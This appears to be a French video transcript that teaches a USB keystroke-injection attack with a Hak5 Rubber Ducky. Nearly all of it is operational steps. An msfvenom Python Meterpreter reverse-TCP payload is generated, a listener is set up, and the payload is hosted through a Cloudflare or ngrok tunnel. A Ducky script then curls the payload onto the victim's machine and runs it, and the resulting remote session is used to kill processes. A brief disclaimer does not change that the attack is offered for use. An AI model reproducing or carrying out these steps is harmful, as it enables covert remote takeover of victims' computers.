Bonjour, aujourd'hui tuto comment avoir une connexion à distance grâce à une Hack5 Rubber Ducky. Alors petit disclaimer, je vais peut-être vous apprendre à faire une attaque, mais bien sûr ne refaites pas ça chez vous ou faites-le dans un environnement autorisé. Donc voilà, bonne vidéo. Donc pour cela on aura besoin du côté attaquant. On aura besoin de une Rubber Ducky. On aura besoin d'un environnement pour le piratage informatique, donc moi je suis sur Kali. Mais en vrai, on a juste besoin de Metasploit Framework. On a besoin aussi de Firefox et Cloudflare ou Ngrok. Et du côté cible, juste besoin de Python. Donc première étape, c'est déjà de démarrer Metasploit Framework. Voilà, maintenant on a la console Metasploit. Maintenant, on va générer un programme malveillant en Python. Donc déjà, on fait un MSF Venom. Donc, c'est avec MSF Venom, c'est tout ce qui est pour générer des payloads et tout. List payload. Pour avoir accès à la liste de tous les payloads qui existent sur MSF Venom. Donc, on va aller chercher dans Python. Là, Python. Et on va prendre ça. Python Meterpreter Reverse TCP. Donc lire. Donc pour générer le payload, enfin MSF Venom -p pour payload, on rentre le nom de notre payload Python Meterpreter Reverse TCP. On fait un lport et on va le mettre sur le port 4444. Le lhost, donc notre adresse locale, on fait un IPA. Pour ma part, c'est 172.22.22.106. Donc on la rentre et on spécifie le chemin de sortie sous. Moi je vais le nommer cool.py. Donc là ça va générer notre programme malveillant. Donc si on fait un ls sur notre Kali, on voit bien cool.py, le voir tout simplement dans le là. Donc après on va faire un listener, donc on fait un use exploit multi handler. Donc on fait un show option, lui il demande le lhost et le nom du payload, donc on fait set lhost, on rentre notre IP local et on fait un set payload et on rentre Python en Meterpreter en reverse TCP. Donc là tout est bon, on a juste à faire un run, on attend qu'il y a la petite ligne bleue, voilà elle est là. Du coup maintenant on a généré notre listener ainsi que notre payload. Donc maintenant deuxième étape, on va du coup ouvrir un nouveau terminal et on va host notre fichier Python en local pour faire un tunnel Cloudflare pour ainsi le télécharger sur le PC de la victime. Donc on fait juste un sudo su, bon je mets sudo su pour passer admin, mais on peut juste faire sudo devant la console, devant la commande qu'on va faire. On fait un système CTL start Apache 2. Donc Apache 2, il faut l'installer. Je crois il est soit installé par défaut, soit faut l'installer, mais voilà. On run et si on fait un système CTL statut Apache, on voit bien qu'il est run. Il est actif. Donc si on fait un localhost, on a Apache qui tourne. Donc maintenant on va modifier cette page pour avoir notre fichier Python. Du coup on ouvre notre exploiteur de fichiers en admin, c'est important parce qu'on doit modifier les fichiers. Donc on va dans file system, on va dans var www html. On peut supprimer, moi je vais le supprimer mais on n'est pas obligé. Et on va juste copier-coller, donc CTRL C, CTRL V, notre fichier Python. Maintenant à Google Cloudflare, on va créer un tunnel. Donc on fait juste Cloudflare tunnel -url. Donc on copie notre URL, on fait enter. Alors juste si vous avez ngrok, faites ngrok 80 ou vous regardez le port http comme ça et ça vous génère un lien. Ça nous génère un lien là-dessus. Donc on a notre fichier Python. Maintenant on va faire le script pour la Rubber Ducky. Donc on va juste taper Ducky en code.
Donc une fois qu'on est sur cette page, on va juste prendre la rubber ducky. Là on a notre rubber ducky. Sur la version 3.0 on peut switch de USB à attaque. Du coup c'est ce qu'on va faire. Donc pour ce faire on a juste à démonter la clé. Là il y a un petit bouton. Donc pour switch en USB, il faut juste, quand on la met dans l'ordi, on appuie longtemps sur le bouton. Je la mets dedans et j'appuie sur le bouton. Et on relâche. Donc, alors sur Windows c'est instantané. Mais sur Linux, je sais pourquoi ça prend un peu plus de temps. Donc là juste on va voir comme ça. Donc normalement si c'est bien fait on a juste à attendre un petit peu, voilà. Et là on ouvre, et là du coup on a le nouveau fichier. Donc là elle est passée en mode carte SD, mais sur je l'ai pas, sur la rubber ducky, la première, il fallait un lecteur de carte SD. Donc il fallait un truc comme ça pour justement lire la carte SD, la micro SD. Mais non, on n'a plus besoin parce que du coup, grâce à cette manip. Du coup, maintenant, il faut écrire le script à mettre dans notre rubber ducky. Donc, le script, il est assez simple. On va juste faire qu'on a besoin de ouvrir le terminal sur le PC de la victime et juste après insérer la clé pour ça écrire les commandes. Donc, on va juste faire en début de ligne, on va écrire un delay de 1 seconde. Après, on met un string curl. On met le lien de notre programme.py, donc c'est le lien généré plus le nom du fichier. On va faire un delay enfin un tout petit délai pour juste le temps que ça finisse d'écrire la commande. Après on fait enter. Selon la rapidité de votre ordi, ça prendra je pense en 1 et 5 secondes. Donc là ça va lancer la commande, ça attend. On va faire un string Python 3 pour le nom de votre fichier Python. Parce que en gros là ce que ça a fait, c'est que ça a attendu 1 seconde. Ça a écrit cette commande sur le terminal, ça a attendu, ça a fait enter. Ça a attendu que ça a téléchargé et là ça a écrit pour exécuter le fichier. Donc après on fait juste la même chose, on fait un delay 200 et enter. Après ça lance la commande. On clique sur generate payload et download payload. Ça va générer un inject.bin et on la met dans le disque ducky. Donc là on a bien notre inject.bin. Là c'est important, il faut éjecter la clé. Du coup là elle a été éjectée. Ce qu'on fait c'est qu'on l'enlève juste. On va reswitch du mode USB à attaque. Du coup juste on laisse appuyer un peu dessus. Ça devrait être bon. Donc d'une fois qu'on a mis notre script, on a juste à reconstruire la clé. Bon c'est optionnel, je vais le faire quand même. Donc d'une fois, bon là je l'ai juste donc là on va pouvoir faire l'attaque. Voilà, là j'ai le côté attaquant et là j'ai le côté cible. Donc du côté cible on a juste à ouvrir le terminal et à mettre la rubber ducky. Donc là on met la clé. Voilà, ça va télécharger le programme. Et après, du coup, ça attend 5 secondes parce que c'est censé être plus long normalement. Et là, ça va juste exécuter le programme. Et on revient du côté attaquant. Et là, on a un accès méterpréteur. Bon, ça, en gros, puisque c'est un reverse TCP en Python, on n'a pas beaucoup d'utilisation. Mais on peut tout de même faire un help pour voir ce qu'on peut faire. Et on peut quand même faire un truc sympa, typiquement du côté cible. J'ai juste à ouvrir, je sais pas, Firefox et on peut genre fermer Firefox. Donc on peut tout simplement faire un PS pour voir les process qui sont actuellement en train de fonctionner. Donc là on a un Firefox ESR, donc c'est tout simplement Firefox. Il y en a beaucoup des process. Et là on peut faire terminer process par name, donc on fait un pkill. On fait un pkill Firefox ESR, donc ça a killé des process. On revient du côté attaque cible et là on n'a plus Firefox, du coup ça a bien kill Firefox. Donc voilà, fin de vidéo.